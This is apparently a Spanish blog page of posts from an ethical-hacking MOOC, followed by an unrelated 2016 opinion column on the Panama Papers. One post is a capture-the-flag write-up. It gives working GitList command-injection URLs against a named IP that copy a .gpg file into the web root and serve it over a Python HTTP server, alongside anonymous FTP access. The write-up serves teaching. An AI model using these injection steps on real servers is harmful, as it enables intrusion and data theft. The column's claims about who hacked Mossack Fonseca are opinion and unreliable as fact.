UNIDAD 3 Reto Final #moocHackingMU, Episodio II

El reto final: fue un poco difícil ya que luego de crear el grupo solo participamos tres personas activamente en el reto, Cadtux Jack Diego Roibás, Juan José Díaz, Remigio Salvador Sánchez, al final solo logramos sacar unos cuantos archivos nivel uno y nivel 2por ftp y por un vulnerabilidad de gitlist.  A continuación les mostrare un video y la descripción de cómo lo logramos.

Antes de iniciar realizamos varios scann de seguridad utilizando Nessus, Vega, entre otros.

Reporte de Nessus

Con este reporte realizamos pruebas a las vulnerabilidades y parchamos tomando en cuenta los resultados del scan de nessus. 

Para descargar documento #1

Simple ftp anonimo

ftp://45.55.95.29/

Par descargar el documento #2

se utilizó una vulnerabilidad encontrada en gitlist la cual resolvimos actualizando el sistema.

http://hatriot.github.io/blog/2014/06/29/gitlist-rce/

Proceso de descarga:

Abrir servidor:

http://45.55.95.29/

ahora vamos a gitlist/gitlist/tree/master. En esta ruta vamos a ejecutar comandos de consola que con el usuario wwwdata, para explorar la vulnerabilidad escribimos luego de la ruta “”` comando a ejecutar y cerramos` esto devolverá un resultado como si fuese un error pero no lo es, lo que está haciendo es que nos está mostrando el resultado de la ejecución del comando.

http://45.55.95.29/gitlist/gitlist/tree/master/””` ls /usr/share/doc/base-files/*.gpg`

copiamos el archivo con extensión gpg a una ruta donde podemos levantar un servidor python:

http://45.55.95.29/gitlist/gitlist/tree/master/””`cp /usr/share/doc/base-files/*.gpg /var/www/html/gitlist/cache/`

validando copia del archivo:

http://45.55.95.29/gitlist/gitlist/tree/master/""`ls /var/www/html/gitlist/cache/`

levantando servidro python:

http://45.55.95.29/gitlist/gitlist/tree/master/""`cd /var/www/html/gitlist/cache && python -m SimpleHTTPServer 8000`

el server se quedara cargando así que debemos cambiar a la siguiente ruta

http://45.55.95.29:8000 y descargar archivo

SQL injection UNIDAD 2 TAREA 2 SQL injection

Los sistemas a los que no se les aplica niveles de seguridad avanzados son vulnerables a inyeccion de codigo sql.
a continuacion unas imagenes de esta tarea y más adelante un  link donde pueden hacer esta práctica.

aquí les comparto un enlace con el que podrán realizar prácticas y ver como se hace inyeccion de codigo.

http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/

Wireshark Unida 2 Tarea 1 Comunidad de #moocHackingMU, Episodio II

En esta práctica vamos a ver a utilizar el analizador de paquetes Wireshark.
Con esta herramienta podemos analizar el tráfico lo que nos permite ver todas la conecciones que hay en nuestra red así como los protocolos que se están ejecutando.

A continuación vamos a filtrar por ssl para ver qué resultado nos trae.

Como podemos ver hace un filtro por todas las conecciones que están utilizando algún certificado digital.

3 Sitios interesantes sobre Hacking. unidad 1 tarea 2 del #moocHackingMU

Aquí encontraremos tres páginas interesantes sobre Hacking.

1. http://hacking-etico.com/
2. http://www.infosecurityvip.com/
3. https://www.facebook.com/groups/EthicalHackersRD/?fref=ts

Los ‘Panama Papers’ y la falta de transparencia

¿Qué trama política hay detrás de los 12 millones de documentos de la firma forense panameña Mossack Fonseca que el periódico alemán Süddeutshe Zeitung dice poseer? ¿Qué importancia tienen las 120 mil empresas de papel creadas por Mossak Fonseca en 40 años al lado de más de 10 millones que existen en EEUU y Europa?

Hay que aclarar, en primer lugar, que los documentos electrónicos de la firma panameña  no fueron filtrados (leaked). Fueron 'hackeados'. En otras palabras, el sistema fue penetrado y la información fue robada por agentes profesionales cuya identidad, por el momento, se desconoce. Según la Gazeta del Sur de Alemania, “la información provino de una fuente anónima”. Pero el diario agrega que “se supone que algunas computadoras del despacho Mossack Fonseca fueron intervenidas por hackers a fin de obtener correos electrónicos, certificados, estados de cuenta y otros muchos documentos”.

La entidad que se hace responsable del 'hackeo', el Consorcio Internacional de Periodistas de Investigación (ICIJ), con sede en Washington, DC, EEUU, es financiada por los Think Tanks más reconocidos del establishment conservador de EEUU y Europa. El periódico alemán, Süddeutshe Zeitung, asumió el liderazgo en el reportaje sobre la firma panameña que maneja Ramón Fonseca Mora.

Curiosamente, entre los millones de documentos que le fueron hackeados a Fonseca, muy pocos se refieren a los negocios que la firma realiza con sus contrapartes en EEUU, Gran Bretaña o Europa occidental. Son en estos países donde se realizan las transacciones más grandes. Las revelaciones se detienen con detalle en Rusia, Islandia, México, Brasil, Argentina y España. Países importantes, pero con economías enanas comparadas con EEUU y Europa occidental.

Fonseca señala que entre sus socios más importantes se encuentran bancos y abogados en Miami (Florida) y el estado de Nevada en EEUU. Este último, junto con Delaware, son las 'lavadoras' más grandes del mundo. Compiten con sus contrapartes en el Canal de la Mancha (Gran Bretaña). Estas lavadoras, sin embargo, no son consideradas 'off-shore' (extranjeras) y pueden operar debido a la protección que reciben de sus respectivos gobiernos (Washington y Londres, respectivamente).

Panamá tiene una tradición oscura de prestar servicios a los grandes capitales financieros mundiales que se remonta a la década de 1920. En aquel entonces se creó en Panamá la 'sociedad anónima' para empresas británicas y norteamericanas sin dar a conocer sus propietarios. Poco después apareció el sistema para abanderar barcos de los grandes países con flotas marítimas. Estas operaciones no son 'ilegales' pero son inmorales. Les permite a los grandes propietarios de esos países lavar su dinero mal habido y evadir compromisos con sus respectivos fiscos. En la actualidad, los gobiernos de Washington y Londres toleran el llamado 'blanqueo' siempre y cuando se haga dentro de sus fronteras, no en lo que llaman los 'paraísos fiscales' de otros países.

Las rendijas que le permitían a los abogados  y bancos ‘off-shore’ prestarle servicios a las grandes empresas de EEUU y Gran Bretaña para lavar dinero parecen haber sido cerradas por el FMI.  La OCDE sigue persiguiendo a las firmas ‘off-shore’ que le prestan servicios a los multimillonarios que no quieren pagar impuestos en sus países de origen. Esta persecución no afecta a los bancos y abogados en EEUU y Gran Bretaña (que no son - por definición - 'off-shore').

En conclusión, los abogados panameños que prestan servicios a empresas norteamericanas, británicas y de otros países se encuentran bajo la mira de los gobiernos que quieren que el negocio regrese a casa. Estos gobiernos han atacado formalmente a los 'blanqueadores' panameños y de otros países 'off-shore' a través del FMI y de la OCDE. Ahora han dado un segundo paso. EEUU y Gran Bretaña quieren introducir otro elemento al ataque frontal contra las operaciones de bancos y abogados fuera de sus respectivas jurisdicciones. Bajo el manto de supuestas investigaciones periodísticas, han descubierto el mundo tenebroso de las transacciones financieras internacionales de países, gobernantes y otras personalidades que son descartables (Putin, Lula, Peña Nieto, Kirchner, el primer ministro de Islandia y otros). Han ignorado las operaciones de los jefes de gobierno de los países 'buenos' y de sus camarillas.

Las revelaciones (filtraciones o 'leaks') de Snowden y Wikileaks fueron transparentes en sus intenciones: descubrir las maniobras inaceptables del gobierno de EEUU. El Consorcio de Washington y sus 'papeles de Panamá' no son transparentes y aún no conocemos cuáles son, en última instancia, sus verdaderas intenciones.

7 de abril de 2016.

- Marco A. Gandásegui, hijo, profesor de Sociología de la Universidad de Panamá e investigador asociado del Centro de Estudios Latinoamericanos Justo Arosemena (CELA) 

www.marcoagandasegui14.blogspot.com

www.salacela.net

Fuente original: http://www.alainet.org/es/articulo/176576